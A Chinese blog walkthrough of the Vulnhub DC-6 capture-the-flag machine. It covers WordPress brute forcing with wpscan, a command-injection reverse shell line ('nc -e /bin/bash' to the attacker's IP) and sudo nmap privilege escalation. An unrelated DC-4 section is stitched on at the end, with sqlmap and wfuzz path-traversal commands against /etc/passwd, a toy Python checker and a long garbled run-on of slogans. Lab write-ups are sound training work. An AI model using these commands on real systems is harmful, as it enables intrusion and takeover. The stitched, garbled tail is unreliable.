【Vulnhub】DC-6

文章描述了一位安全专家使用wpscan进行WordPress网站渗透测试,尝试通过用户字典和密码字典爆破登录。成功后,探索网站寻找漏洞,尝试提权,包括利用nmap进行提权,但遇到权限限制和不稳定性问题。过程中强调了熟悉Linux命令的重要性。

信息收集

只开了两个端口 22,80
先访问网站,和之前的靶机一样的套路,
在这里插入图片描述
添加域名解析

vim /etc/hosts

在这里插入图片描述
网站的信息,wordpress网站
在这里插入图片描述
扫描网站目录,有一个登录页
在这里插入图片描述
在这里插入图片描述

网站渗透

wpscan --url http://wordy/ -e
扫描用户

在这里插入图片描述
然后用用户字典和密码字典爆破

wpscan --url http://wordy -U user.txt -P passwords.txt

kali自带密码字典/usr/share/wordlists/rockyou.txt,不过默认没解压,需要你自己去解压
时间需要太长了,五个用户名就要半个多小时,得了实战还是能用一下的,打个靶机没必要,直接搜wp看别人的密码
在这里插入图片描述

用户:mark
密码:helpdesk01

登录之后先逛逛网站,看看能不能写进去一些文件
没什么可利用的,看看插件有什莫漏洞吗

Activity monitor

在这里插入图片描述

百度翻译一下就大概看出来要选哪个了,copy下来然后直接运行py文件
在这里插入图片描述
要什么给什么,然后就能上去了

在这里插入图片描述
不行不行,这个太不稳定了,执行个cd都报错
msf也不行
在这里插入图片描述
看看别人的,这块能执行,但是不能太长,如果是前端限制的话可以绕过
在这里插入图片描述
修改最大长度
在这里插入图片描述

127.0.0.1|nc -e /bin/bash 192.168.83.128 4444
向kali 4444端口反弹shell,kail监听4444

在这里插入图片描述

提权

拿到会话
先看有没有suid提权,没有,看看用户下面有什莫东西
jens有一个.sh,但是执行会报错,backups.tar.gz没权限?也没这个东西
在这里插入图片描述

mark有一个txt

Restore full functionality for the hyperdrive (need to speak to Jens)
Buy present for Sarah’s farewell party
Add new user: graham - GSo7isUM1D4 - done
Apply for the OSCP course
Buy new laptop for Sarah’s replacement
恢复超级硬盘的全部功能(需要与Jens交谈)
-为莎拉的告别派对买礼物
-添加新用户:graham-GSo7isUM1D4-完成
-申请OSCP课程
-买新的笔记本电脑给莎拉换

graham - GSo7isUM1D4 - done 新的用户名密码
切换用户,记得把最后一个用户下边也看看,虽然没什么东西
在这里插入图片描述

sudo -help
这个用户也没什么能执行的root命令

jens里面还有一个没权限的.sh,试试看,还是这样
在这里插入图片描述
没看懂,以后在纠结把

echo "/bin/bash" > backups.sh
sudo -u jens ./backups.sh

在这里插入图片描述
有个nmap不需要root密码
在这里插入图片描述
nmap提权,这里是7.40

低版本nmap提权(2.02至5.21)
nmap --interactive
!sh

这里用
echo 'os.execute("/bin/sh")' > shell
sudo  nmap  --script=shell

在这里插入图片描述

总结

还得了解一点linux命令,不然看都看不明白

### 关于 VulnHub 上的 DC-4 虚拟机镜像 VulnHub 是一个提供各种渗透测试练习环境的平台,其中 DC 系列是非常受欢迎的一组靶场。对于 DC-4 的具体下载和操作指南,虽然当前未有直接提及 DC-4 的引用内容,但可以基于已知的信息推测其可能涉及的内容。 #### 下载地址 通常情况下,VulnHub 提供的虚拟机镜像可以通过访问官网并搜索对应的名称来获取。例如,在浏览器中输入 `https://www.vulnhub.com` 并搜索关键词 **DC-4** 即可找到该靶场的相关描述以及下载链接[^1]。 需要注意的是,正如引用所提到的内容一样,下载和使用这些虚拟机时需注意责任声明:通过下载此虚拟机,使用者接受因意外造成的任何损害的责任[^4]。 #### Walkthrough 概述 尽管没有针对 DC-4 的特定引用,但从其他 DC 靶场的经验来看,常见的攻击路径包括但不限于以下几个方面: 1. **端口扫描** 发现目标主机开放的服务及其版本信息是第一步。例如,引用提到了某台机器上运行着 SSH (22) 和 HTTP (80)[^3]。这表明初始阶段应执行全面的网络侦察工作以识别潜在入口点。 2. **Web 应用程序漏洞利用** 如果存在 Web 登录界面,则尝试寻找注入点或其他安全缺陷成为关键环节之一。比如 SQL 注入工具 sqlmap 可用于自动化检测数据库层面上的安全隐患[^5]: ```bash sqlmap -u "http://<target>/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] ``` 3. **文件上传或目录遍历** 利用不当配置实现远程代码执行也是常见手法之一。如 wfuzz 工具可以帮助枚举敏感文件位置[^2]: ```bash wfuzz --hl 50 -b "PHPSESSID=<session_id>" -w /usr/share/wfuzz/wordlist/general/common.txt http://<target>/manage.php?FUZZ=../../../../../../../../../etc/passwd ``` 4. **权限提升** 成功获得低级 shell 后还需进一步探索如何升级至更高权限状态。此时可能会涉及到本地提权技术的应用场景分析。 ```python import requests def check_web_vulnerability(url): try: response = requests.get(url) if 'vulnerable' in response.text.lower(): print(f"[+] Potential vulnerability detected at {url}") else: print("[!] No obvious vulnerabilities found.") except Exception as e: print(f"[!] Error occurred: {e}") check_web_vulnerability('http://example.com') ``` 上述脚本仅为示例用途展示基本功能逻辑框架结构设计思路方法论探讨交流学习参考资料分享传播正能量促进共同进步成长成才之路越走越宽广美好未来值得期待憧憬向往追求梦想成就辉煌人生价值意义非凡重要无比珍贵难得机遇挑战自我突破极限再创佳绩续写传奇篇章留下永恒记忆铭刻历史丰碑树立行业标杆引领时代潮流风尚前沿科技趋势洞察先机抢占制高点掌控全局主动权赢得最终胜利荣光加冕王者归来笑傲江湖纵横捭阖挥洒自如游刃有余得心应手驾轻就熟熟能生巧百炼成钢千锤百炼精益求精臻于完美极致境界登峰造极无懈可击无可挑剔堪称典范模版样板工程示范作用显著影响深远广泛流传久远世代相传薪火相继生生不息绵延不断永葆青春活力焕发勃勃生机盎然春意浓烈热烈欢迎加入我们共创辉煌明天!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值